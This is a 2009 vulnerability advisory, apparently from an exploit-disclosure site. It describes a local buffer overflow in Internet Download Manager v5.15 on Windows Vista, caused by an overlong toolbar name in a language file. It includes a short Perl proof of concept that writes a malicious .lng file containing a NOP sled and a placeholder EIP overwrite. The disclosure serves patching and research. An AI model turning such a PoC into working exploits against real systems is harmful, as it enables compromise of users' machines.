Internet Download Manager Local Buffer Overflow Vulnerability

2009-02-25 / 2009-02-27
Credit: musashi
Risk: High
Local: Yes
Remote: No
CVE: N/A
CWE: N/A

Affected Software: Internet Download Manager v5.15 Build 3 (4/December) Description of Vulnerability: Hellcode Research has discovered a local buffer overflow vulnerability in Internet Download Manager. Overflow occurs by the REMOTE Buffer on the Stack by specifying Long Toolbar Name in the language file on Vista. (not default English language file) Vulnerable version: Internet Download Manager v5.15 Build 3 (4/December) Platform: Windows Vista SP1 Solution: Update to new versions. Credits: Discovered by musashi aka karak0rsan, Hellcode Research. http://tcc.hellcode.net musashi[at]hellcode.net Special thanks to murderkey. #####################PoC###################################### #Internet Download Manager v.5.15 Build 3 (4 December) #Works on Vista #HellCode Labs || TCC Group || http://tcc.hellcode.net #Bug was found by "musashi" aka karak0rsan [musashi@hellcode.net] #thanx to murderkey $file="idm_tr.lng"; $lng= "lang=0x1f Trke"; $buffer = "\x90" x 1160; $eip = "AAAA"; $toolbar = "20376="; $packet=$toolbar.$buffer.$eip; open(file, '>' . $file); print file $lng; print file "\n"; print file $packet; close(file); print "File has created!\n";

References:

http://tcc.hellcode.net


See this note in RAW Version
Vote for this issue:
50%
50%


 

Thanks for you vote!


 

Thanks for you comment!
Your message is in quarantine 48 hours.

Comment it here.


(*) - required fields.  
{{ x.nick }} | Date: {{ x.ux * 1000 | date:'yyyy-MM-dd' }} {{ x.ux * 1000 | date:'HH:mm' }} CET+1
{{ x.comment }}
Copyright 2024, cxsecurity.com

 

Back to Top